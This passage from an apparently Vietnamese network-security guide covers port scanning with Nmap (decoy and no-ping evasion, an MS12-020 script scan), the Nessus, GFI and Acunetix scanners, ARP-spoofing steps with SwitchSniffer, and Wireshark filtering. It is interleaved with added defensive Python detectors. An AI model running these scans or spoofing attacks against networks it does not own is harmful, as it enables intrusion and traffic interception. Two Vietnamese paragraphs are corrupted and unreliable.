Nh ta thy gi UDP khng cha cc thng s Flag, cho nn khng th s dng cc phng thc Scan port ca TCP s dng cho UDP c. Tht khng may hu ht h thng u cho php gi ICMP. Nu mt port b ng, khi Server nhn c gi ICMP t client n s c gng gi mt gi ICMP type 3 code 3 port vi ni dung l unreachable v Client. Khi thc hin UDP Scan bn hy chun b tinh thn nhn c cc kt qu khng c tin cy cao.
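The flag patterns described in b.1, seen from the defender's side, as an added example that is not part of the original article: a small detector that reads firewall-style log lines (one per TCP segment) and raises an alert when one source sends bare SYNs to many distinct ports on a host within a short window (the SYN and connect scans above look identical at the packet filter), and immediately when a segment carries the XMAS (FIN, PSH, URG) or NULL (no flags) combination, which no normal TCP stack ever sends. The log format, the sample lines and the thresholds are constructed for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall-style log (not real traffic): one line per TCP segment, with
# the flag letters S/A/F/R/P/U used in the text above; "-" means no flags at all.
SAMPLE_LOG = """\
2012-06-12T09:00:01 src=10.0.0.5 dst=192.168.0.211 dport=21 flags=S
2012-06-12T09:00:01 src=10.0.0.5 dst=192.168.0.211 dport=22 flags=S
2012-06-12T09:00:02 src=10.0.0.5 dst=192.168.0.211 dport=23 flags=S
2012-06-12T09:00:02 src=10.0.0.5 dst=192.168.0.211 dport=25 flags=S
2012-06-12T09:00:03 src=10.0.0.5 dst=192.168.0.211 dport=53 flags=S
2012-06-12T09:00:03 src=10.0.0.5 dst=192.168.0.211 dport=80 flags=S
2012-06-12T09:00:04 src=10.0.0.5 dst=192.168.0.211 dport=110 flags=S
2012-06-12T09:00:04 src=10.0.0.5 dst=192.168.0.211 dport=135 flags=S
2012-06-12T09:00:05 src=10.0.0.5 dst=192.168.0.211 dport=139 flags=S
2012-06-12T09:00:05 src=10.0.0.5 dst=192.168.0.211 dport=443 flags=S
2012-06-12T09:00:06 src=10.0.0.5 dst=192.168.0.211 dport=445 flags=S
2012-06-12T09:00:06 src=10.0.0.5 dst=192.168.0.211 dport=3389 flags=S
2012-06-12T09:00:10 src=10.0.0.9 dst=192.168.0.211 dport=80 flags=S
2012-06-12T09:00:10 src=10.0.0.9 dst=192.168.0.211 dport=80 flags=A
2012-06-12T09:00:30 src=10.0.0.7 dst=192.168.0.211 dport=3389 flags=FPU
2012-06-12T09:00:31 src=10.0.0.7 dst=192.168.0.211 dport=3389 flags=-
"""


def parse_line(line):
    """Split one constructed log line into a record with typed fields."""
    ts, *pairs = line.split()
    fields = dict(p.split("=", 1) for p in pairs)
    return {
        "ts": datetime.fromisoformat(ts),
        "src": fields["src"],
        "dst": fields["dst"],
        "dport": int(fields["dport"]),
        "flags": set(fields["flags"].replace("-", "")),
    }


def detect_scans(lines, port_threshold=10, window=timedelta(seconds=60)):
    """Return alerts as tuples: (kind, source address, detail).

    kind is 'null_probe' or 'xmas_probe' (detail = destination port) for
    malformed flag combinations, or 'syn_sweep' (detail = number of distinct
    ports) when one source sends bare SYNs to at least `port_threshold`
    different ports of one host within `window`.
    """
    alerts = []
    syns = defaultdict(list)  # (src, dst) -> [(timestamp, dport)] for bare SYN segments
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        f = rec["flags"]
        if not f:
            alerts.append(("null_probe", rec["src"], rec["dport"]))
        elif {"F", "P", "U"} <= f and not ({"S", "A"} & f):
            alerts.append(("xmas_probe", rec["src"], rec["dport"]))
        elif f == {"S"}:
            syns[(rec["src"], rec["dst"])].append((rec["ts"], rec["dport"]))
    for (src, dst), events in syns.items():
        events.sort()
        # sliding window anchored at each SYN: distinct ports hit within `window`
        for i, (t0, _) in enumerate(events):
            ports = {port for t, port in events[i:] if t - t0 <= window}
            if len(ports) >= port_threshold:
                alerts.append(("syn_sweep", src, len(ports)))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG.splitlines()):
        print(alert)
```

A normal client (10.0.0.9 in the sample) also opens connections with a bare SYN, so the sweep rule keys on the number of distinct ports per source and host rather than on SYNs alone; the XMAS and NULL rules need no threshold because those flag combinations never occur in legitimate traffic.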

c. Port scanning with Nmap

Nmap is a very powerful and long-famous port scanner trusted by the hacker community. It supports every port-scanning method and also supports scanning for hostnames and the services running on a system. Nmap now has both a graphical interface and a command-line interface, and runs on both *NIX and Windows. Nmap is free; download it from: http://nmap.org/download.html

Below is how to use Nmap to scan:

C:\nmap-3.93>nmap -h
Nmap 3.93 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
  -sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
  -sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
  -sV Version scan probes open ports determining service and app names/versions
  -sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
  -p <range> ports to scan.  Example range: '1-1024,1080,6666,31337'
  -F Only scans ports listed in nmap-services
  -v Verbose. Its use is recommended.  Use twice for greater effect.
  -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
  -6 scans via IPv6 rather than IPv4
  -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
  -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
  -oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
  -iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
  --interactive Go into interactive mode (then press h for help)
  --win_help Windows-specific features
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

The scan types Nmap supports:
- nmap -sT: where s stands for Scan and T for the TCP scan type
- nmap -sU: uses a UDP scan
- nmap -sP: uses a ping scan
- nmap -sF: uses a FIN scan
- nmap -sX: uses the XMAS scan method

- nmap -sN: uses the NULL scan method
- nmap -sV: scans for the names of applications and their versions
- nmap -sR/-I: RPC scan

nmap -sT -p1-5000 -sV -O -T5 192.168.0.211: this command uses the TCP scan method on ports 1 – 5000, enables fingerprinting of services and OS, and -T5 is a fast scan of the computer 192.168.0.211.

Advanced options that combine with the scan types in Nmap:
- -O: used to learn the operating system running on the host. For example, to scan with the XMAS scan method and guess the operating system of www.tocbatdat.net we use: nmap -sX -O www.tocbatdat.net
- -p: the range of ports to scan
- -F: only the ports in Nmap's own scan list
- -v: used twice to increase the reliability and effectiveness of whichever scan method we use (in the help output above, -v is verbose output, to be used twice for greater effect)
- -P0: do not ping, so as to reduce the chance that scan-blocking on websites or servers catches the scan. For example, to scan the website www.tocbatdat.net with a UDP scan of ports 1 to 1024, using -v twice to improve effectiveness and without pinging the site: nmap -sU -p 1-1024 -v -P0

Nmap also supports hiding the scan to evade scan detection on the server, by using -Ddecoy_host1,decoy2, which hides the scan.
-6: scan over IPv6
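One defensive use of the -oG (grepable) output listed in the Nmap help above, as an added example that is not part of the original article: parse the Ports: lines of a scan of your own hosts and compare the open TCP ports against a baseline of what each server is supposed to expose, so that a database port or Remote Desktop reachable from the network shows up as a finding. The sample output, the two hosts and the baseline policy are constructed for this example; the field layout (tab-separated "Host:", "Ports:" and "Ignored State:" fields, with each port as port/state/protocol/owner/service/rpc/version/) follows Nmap's grepable format.

```python
# Constructed sample of Nmap "grepable" (-oG) output for two hosts; not real scan output.
SAMPLE_GREPABLE = """\
# Nmap 6.01 scan initiated Tue Jun 12 09:00:00 2012 as: nmap -sT -p1-5000 -oG inventory.gnmap 192.168.0.0/24
Host: 192.168.0.211 ()\tStatus: Up
Host: 192.168.0.211 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (4997)
Host: 192.168.0.194 ()\tStatus: Up
Host: 192.168.0.194 ()\tPorts: 80/open/tcp//http///, 1433/open/tcp//ms-sql-s///, 3306/closed/tcp//mysql///\tIgnored State: closed (4997)
# Nmap done at Tue Jun 12 09:02:10 2012 -- 256 IP addresses (2 hosts up) scanned
"""

# Assumed baseline: the TCP ports each server is meant to expose (policy data for
# this example, not from the page). Hosts missing here are treated as "no ports allowed".
BASELINE = {
    "192.168.0.211": {22, 80},
    "192.168.0.194": {80},
}


def parse_grepable(text):
    """Map host address -> set of open TCP ports from -oG output."""
    open_ports = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and blank lines
        # Fields are tab-separated "Name: value" pairs.
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        if "Ports" not in fields:
            continue  # the "Status: Up" line carries no port data
        host = fields["Host"].split()[0]  # drop the "(hostname)" part
        ports = set()
        for entry in fields["Ports"].split(", "):
            parts = entry.split("/")  # port/state/protocol/owner/service/rpc/version/
            if parts[1] == "open" and parts[2] == "tcp":
                ports.add(int(parts[0]))
        open_ports[host] = ports
    return open_ports


def unexpected_ports(scan, baseline):
    """Open ports not allowed by the baseline, per host (sorted lists)."""
    findings = {}
    for host, ports in scan.items():
        extra = ports - baseline.get(host, set())
        if extra:
            findings[host] = sorted(extra)
    return findings


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_GREPABLE)
    for host, ports in unexpected_ports(scan, BASELINE).items():
        print(f"{host}: unexpected open ports {ports}")
```

In the sample, 3389 on 192.168.0.211 (the port the MS12-020 check below targets) and 1433 on 192.168.0.194 are reported; closed ports such as 3306 are ignored because only the state "open" is counted.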

[TL: o to v An ton thng tin cho ABC

6, 2012

Ngoi ra nmap cn cho chng ta nhng options output kt qu ra nhiu nh dng file khc nhau. 2. Scan l hng bo mt trn OS a. S dng Nmap Scan l hng bo mt ca OS Nmap c s dng tp Signature scan l hng bo mt l Nmap Script Engine. Mi file Nmap Script Engine (.nse) s scan c mt loi l hng bo mt. Di y ti trnh by cch Scan l hng bo mt MS12-020, l hng cho php tn cng DoS lm treo h thng my tnh Windows 7, 2008, Vista, XP, 2003. Step 1: access Google search query "search ms12-020 by nmap" Step 2: download file Nmap Script Engine (.nse) step 3: Install nmap 6 step 4: Scan s dng nmap vi cu lnh (File nse trong E th mc tocbatdat). nmap -sC -p 3389 -v -v --script-trace --script "E:\\tocbatdat\\ms12-020-rev.nse" IP_Scan Step 5: Khi Nmap bo nh sau th c l hng bo mt (My tnh a ch IP 192.168.0.77 c l hng bo mt MS12-020)


Similarly, we can use the Nmap Scripting Engine to scan for other vulnerabilities.

b. Using Nessus to scan for OS vulnerabilities

Nessus is a very effective free scanning tool that detects vulnerabilities in most operating systems, devices and applications. Download Nessus from: http://www.nessus.org/products/nessus/select-your-operating-system


Installation:

After the installation completes, log in to the console interface:


Click the "here" button to continue:

Click Get Started and set the admin user and password for managing Nessus.


Click Next to continue; if you do not have an Activation Code yet, click the register link:

Click Next to go to the plug-in download screen for Nessus.


The plug-in download and installation process.

After the installation completes, the login window appears.


The administration window after logging in to Nessus:


Before scanning, we first configure a Policy for the scan. Click the Policy tab. By default the system ships with some Policies such as Web App Test and PCI. Click the Internal Network Scan policy, choose Edit, and configure it to scan a Windows Server. Set the scan parameters.

Select only the machine 192.168.0.194 to scan, using the Internal Policy (the policy we just edited).


After the Policy is set up, go to the Scan tab and add the host to scan, then choose Launch Scan. Result after the scan completes: the system produces a Report with the number of vulnerabilities, open ports, OS, services, the names of the vulnerabilities and remediation guidance.


Nessus is truly a powerful and effective scanning tool, and it is free for individual users. Nessus uses a web interface, which is convenient for remote administration, and it also lets you schedule scans. When an effective and free vulnerability scanning solution is needed, Nessus is the number one choice.

c. Using GFI to scan for OS vulnerabilities

GFI is a tool set for scanning, managing and patching vulnerabilities on Windows systems. Being a commercial tool, GFI is quite powerful and popular among solutions of this kind.


After the installation completes, using GFI is similar to using Nessus.


Choose the Full Scan option.

Click Scan and view the results.


A strong point of GFI is that it can patch the vulnerabilities on the scanned machine if it has administrative rights.

3. Scanning for Web vulnerabilities

The Web is the most popular service today, and many applications are built on the web platform, but with that comes a large number of vulnerabilities in this service. Web vulnerabilities can be divided into:
- vulnerabilities in the OS
- vulnerabilities in the web service (IIS, Apache)
- vulnerabilities in the web application (SQL Injection, XSS, ...). These are common and hard to detect without scanning tools.


a. Using Acunetix to scan for Web vulnerabilities

Acunetix is a fast and effective scanner for the vulnerabilities found in today's web services. Install Acunetix Scan:

After a successful installation, scan a website.


Scan result for a website:


b. Lab: using IBM AppScan to scan for Web vulnerabilities

4. Packet analysis and network sniffing techniques

a. The nature of a sniffer

Sniffing is the process of converting the electrical signal into a digital signal and then decoding it up through the higher layers to obtain the needed information. On Windows the WinPcap library does this job; on Linux the LibPcap library does this job. Every tool must use WinPcap or LibPcap in order to decode packets from Layer 2 to Layer 7.


b. A professional data analysis model for enterprises

Below is an integrated traffic analysis model, an application of the sniffing process. Data first passes through an SSL Inspector device (all traffic is decrypted) without interrupting the users' data. All data is decrypted and duplicated out through another port of the device. The flow then enters a traffic splitting device, where the data that is needed is filtered and analyzed. The IDS analyzes network security threats. Forensic is a device that stores the entire network traffic and produces detailed reports (similar to Wireshark but far more detailed).


c. Hub environment

A hub is a single collision domain, so capturing traffic on the network is completely easy. For communication that is not encrypted, the information is easily read.

d. Sniffing techniques in a switched environment

A switch uses its MAC Address Table to forward frames to specific ports:

NE-SW1#show mac address-table
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0100.0ccc.cccc    STATIC      CPU
 All    0100.0ccc.cccd    STATIC      CPU
 All    0180.c200.0000    STATIC      CPU
 All    0180.c200.0001    STATIC      CPU
 All    0180.c200.0002    STATIC      CPU
 All    0180.c200.0003    STATIC      CPU
 All    0180.c200.0004    STATIC      CPU
 All    0180.c200.0005    STATIC      CPU
 All    0180.c200.0006    STATIC      CPU
 All    0180.c200.0007    STATIC      CPU
 All    0180.c200.0008    STATIC      CPU
 All    0180.c200.0009    STATIC      CPU
 All    0180.c200.000a    STATIC      CPU
 All    0180.c200.000b    STATIC      CPU
 All    0180.c200.000c    STATIC      CPU
 All    0180.c200.000d    STATIC      CPU
 All    0180.c200.000e    STATIC      CPU
 All    0180.c200.000f    STATIC      CPU
 All    0180.c200.0010    STATIC      CPU

So when a machine wants to sniff in a switched environment, it has to use one of the following:
- Legitimate sniffing: configure Port Monitor on the switch; whichever port or VLAN you want to monitor, its traffic is mirrored to that port.
- MAC Spoofing: flood the switch's MAC Address Table (this approach is relatively hard).
- ARP Spoofing: change the ARP table on the machine to be sniffed and on the gateway.
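ARP spoofing leaves a trace that the sniffer model above can also be turned against it: an IP that was bound to one MAC is suddenly answered by another MAC, and that MAC goes on to claim more than one IP. The following is an added Python example, not from the original document or from any tool it describes; it replays a constructed list of ARP replies, as a monitoring host on the segment would capture them, and raises an alert for both symptoms. All addresses and timestamps are invented.

```python
"""Detect ARP spoofing from a stream of ARP replies: the defender's view of the
technique described above."""
from collections import defaultdict

# Constructed sample of ARP "is-at" replies as a sniffer on the segment would see
# them: (timestamp in seconds, sender IP, sender MAC). All addresses are invented.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.0.1",   "00:1a:2b:3c:4d:01"),  # gateway answers with its real MAC
    (0.5, "192.168.0.194", "00:1a:2b:3c:4d:94"),  # ordinary host
    (1.0, "192.168.0.121", "00:1a:2b:3c:4d:21"),  # ordinary host
    (5.0, "192.168.0.1",   "00:0c:29:aa:bb:cc"),  # gateway IP suddenly bound to a new MAC
    (5.1, "192.168.0.194", "00:0c:29:aa:bb:cc"),  # the same MAC now also claims .194
    (6.0, "192.168.0.1",   "00:0c:29:aa:bb:cc"),  # poison repeated to keep caches fresh
]


def analyze_arp(replies, gateway_ip=None):
    """Return (alerts, ip_to_mac) after replaying a sequence of ARP replies.

    Two symptoms are flagged: an IP that was bound to one MAC being claimed by a
    different MAC (rated high when the IP is the gateway), and one MAC claiming
    more than one IP, which is what a host that spoofs both the gateway and a
    victim at the same time looks like from the wire.
    """
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append({
                "ts": ts, "type": "ip-mac-change", "ip": ip,
                "old_mac": known, "new_mac": mac,
                "severity": "high" if ip == gateway_ip else "medium",
            })
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            # alert once per newly claimed IP, not on every repeated reply
            if len(mac_to_ips[mac]) > 1:
                alerts.append({
                    "ts": ts, "type": "mac-claims-multiple-ips", "mac": mac,
                    "ips": sorted(mac_to_ips[mac]), "severity": "high",
                })
    return alerts, ip_to_mac


if __name__ == "__main__":
    found, table = analyze_arp(SAMPLE_ARP_REPLIES, gateway_ip="192.168.0.1")
    for alert in found:
        print(alert)
```

An IP-to-MAC change on its own can be benign (DHCP handing the address to another host, a replaced network card, a VRRP failover), so the second rule, one MAC claiming several IPs within seconds, is the stronger signal. On the switch side, Dynamic ARP Inspection with DHCP snooping, or static ARP entries for the gateway on critical hosts, stops the attack rather than just reporting it.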


The SwitchSniffer tool performs ARP spoofing. Step 1: install it.

Step 2: after installation, the system shows the IP and MAC information.


Step 3: set the ARP Spoofing attack options: "<-> gateway" spoofs the IP-MAC pair on both the gateway and the target machine; "<- gateway" only spoofs the MAC on the selected target machine; "-> gateway" only spoofs the MAC on the gateway (this case is used against machines that have security software installed).

Step 4: scan the network and choose the machine to target with the ARP attack.


Click Start to launch the ARP attack; after the ARP attack is performed, all traffic between the attacked machine and the gateway passes through this machine.

e. Sniffer model using an ARP attack helper tool

[Diagram: Router and Switch connected to a VMware Bridge Network; VM1 runs SwitchSniffer to redirect the traffic; VM2 runs the sniffer tools Wireshark, Cain and Colasoft]


The attack model consists of two virtual machines. VM1 has the SwitchSniffer tool installed and performs the ARP attack, so all traffic of the attacked machine passes through VM1 before leaving the network. VM2 shares the same bridged hub with VM1, so any packet that enters VM1 is also received by VM2; on VM2 the sniffer tools such as Colasoft, Wireshark and Cain & Abel are installed to capture the traffic on the network.

5. The Metasploit exploitation tool

a. Overview of the Metasploit tool


b. Using the Metasploit Framework


c. Conclusion

The Metasploit Framework is an effective tool for performing network security testing of a system. The Metasploit Framework supports scanning, exploitation and reporting on the vulnerabilities found.

6. Using Wireshark and Colasoft to analyze packets

After building the sniffer model described above, install the sniffer tools on VM2 to perform the capture.

d. Using Wireshark to analyze packets and network traffic

Install Wireshark.

After installation, run Wireshark. It allows a Capture Filter (selecting only certain IPs, sessions or service ports) to be applied during capture; alternatively, after capturing, Wireshark lets you filter out only the needed information. Wireshark capturing the needed information:


Choose the network card to capture on, and set a Capture Filter to capture only what is needed.

Setting a Capture Filter:
- to or from: host IP
- net 192.168.0.0/24
- to: dst host IP
- dst net IP
- from: src host IP


- port: port 53
- tcp port 80
- tcp portrange 1-500
- dst port 80 or dst port 443
- (host 192.168.0.1 and host 192.168.0.50) and (port 80 or 443)

After capturing, we can apply a Filter to extract the needed information.

Setting a Filter on the captured packets:
- to or from:


ip.addr==IP
- to: ip.dst==IP
- from: ip.src==IP
- except: ip.addr!=IP
- port: tcp.port eq 80 or tcp.port eq 443
- (ip.addr==IP1 and ip.addr==IP2) and (tcp.port eq 80 or tcp.port eq 443)

Set the View to see an entire session (Follow TCP Stream).

Looking at the result, you will see the entire telnet session between the machine 192.168.0.121 and the machine 192.168.0.194.
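The display filters and the Follow TCP Stream view described above, as an added Python example that is not from the original document or from Wireshark: it evaluates ip.addr / tcp.port style filters over a constructed packet list and reassembles both directions of the telnet session between 192.168.0.121 and 192.168.0.194, dropping a retransmitted segment and putting an out-of-order one back in place. Addresses, ports and payloads are all constructed; the "missing bytes" marker for gaps is this example's own convention.

```python
"""Wireshark-style display filters and Follow TCP Stream over a list of packets."""
from collections import defaultdict

# Constructed packets as a capture on VM2 of a telnet session might contain them.
# Fields: IPv4 addresses, TCP ports, TCP sequence number, TCP payload. The .50 HTTP
# packet is there so the filters have something to exclude. Everything is invented.
SAMPLE_PACKETS = [
    {"src": "192.168.0.121", "dst": "192.168.0.194", "sport": 50123, "dport": 23, "seq": 1000, "payload": b""},
    {"src": "192.168.0.194", "dst": "192.168.0.121", "sport": 23, "dport": 50123, "seq": 5000, "payload": b"login: "},
    {"src": "192.168.0.50",  "dst": "192.168.0.194", "sport": 40000, "dport": 80, "seq": 1, "payload": b"GET / HTTP/1.0\r\n"},
    {"src": "192.168.0.121", "dst": "192.168.0.194", "sport": 50123, "dport": 23, "seq": 1005, "payload": b"\r\n"},       # arrives out of order
    {"src": "192.168.0.121", "dst": "192.168.0.194", "sport": 50123, "dport": 23, "seq": 1000, "payload": b"admin"},
    {"src": "192.168.0.194", "dst": "192.168.0.121", "sport": 23, "dport": 50123, "seq": 5007, "payload": b"Password: "},
    {"src": "192.168.0.194", "dst": "192.168.0.121", "sport": 23, "dport": 50123, "seq": 5007, "payload": b"Password: "},  # retransmission
    {"src": "192.168.0.121", "dst": "192.168.0.194", "sport": 50123, "dport": 23, "seq": 1007, "payload": b"s3cret\r\n"},
]


def filter_packets(packets, ip_addr=None, ip_not=None, tcp_port=None):
    """Equivalent of ip.addr==X, !(ip.addr==Y) and tcp.port eq N, AND-ed together."""
    out = []
    for p in packets:
        if ip_addr is not None and ip_addr not in (p["src"], p["dst"]):
            continue
        if ip_not is not None and ip_not in (p["src"], p["dst"]):
            continue
        if tcp_port is not None and tcp_port not in (p["sport"], p["dport"]):
            continue
        out.append(p)
    return out


def list_streams(packets):
    """One canonical key per TCP connection, regardless of which side sent the packet."""
    keys = {tuple(sorted([(p["src"], p["sport"]), (p["dst"], p["dport"])])) for p in packets}
    return sorted(keys)


def follow_tcp_stream(packets, host_a, host_b):
    """Reassemble both directions of the TCP stream between host_a and host_b.

    Returns {"src:sport -> dst:dport": bytes}. Segments are ordered by sequence
    number; bytes already received (retransmissions, overlaps) are dropped and a
    gap in the capture is marked inline instead of silently joining the data.
    """
    segments = defaultdict(list)
    for p in packets:
        if {p["src"], p["dst"]} != {host_a, host_b} or not p["payload"]:
            continue  # other conversations and pure ACKs carry no stream data
        direction = f'{p["src"]}:{p["sport"]} -> {p["dst"]}:{p["dport"]}'
        segments[direction].append((p["seq"], p["payload"]))
    streams = {}
    for direction, segs in segments.items():
        segs.sort(key=lambda s: s[0])
        data = bytearray()
        expected = segs[0][0]
        for seq, payload in segs:
            end = seq + len(payload)
            if end <= expected:
                continue  # pure retransmission of bytes we already have
            if seq < expected:
                payload = payload[expected - seq:]  # trim the overlapping prefix
            elif seq > expected:
                data += b"[%d bytes missing]" % (seq - expected)
            data += payload
            expected = end
        streams[direction] = bytes(data)
    return streams


if __name__ == "__main__":
    for direction, data in follow_tcp_stream(SAMPLE_PACKETS, "192.168.0.121", "192.168.0.194").items():
        print(direction, data)
```

One caveat on the "except" filter listed above: in Wireshark, ip.addr != IP is true whenever either the source or the destination differs from IP, so it rarely excludes anything; !(ip.addr == IP) is the exclusion usually intended, and that is the semantics the ip_not parameter implements. The reassembled client direction also shows why telnet belongs on the list of services to retire: the credentials are readable as soon as the stream is followed.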


e. Using Colasoft to analyze network traffic

While Wireshark is a free tool that an administrator can use to analyze packets and view network bandwidth, Wireshark is not yet very strong at building real-time dashboards and producing smart reports. All of these shortcomings of Wireshark are addressed by the professional packet and network traffic analysis tool Colasoft:


Installing the features of Colasoft.

Colasoft has supporting features for sniffing; after installation it lets you capture: select one or more network cards to capture on, see the current bandwidth on the capture card, and click Start.


The initial interface.


Summary information on traffic, packets and addresses.

Session, IP and application analysis.


Summary of network protocols.

Traffic summary for a specific Endpoint.


Summary of Sessions.

Detailed analysis of packet structure.


Real-time sessions.

System log together with a very smart reporting capability.


Colasoft also allows more detailed filtering than Wireshark; together with its other features, Colasoft is truly an extremely powerful network traffic analysis tool, and it can be used in a real network to troubleshoot network faults.

VII. CONCLUSION

This document gives the reader the most basic concepts of security and information safety as well as in-depth knowledge. From this knowledge the reader gains an overview of the solutions for building a secure network. Skills in using the scanning and exploitation tools help the administrator detect the risks in the system before a hacker can find them.
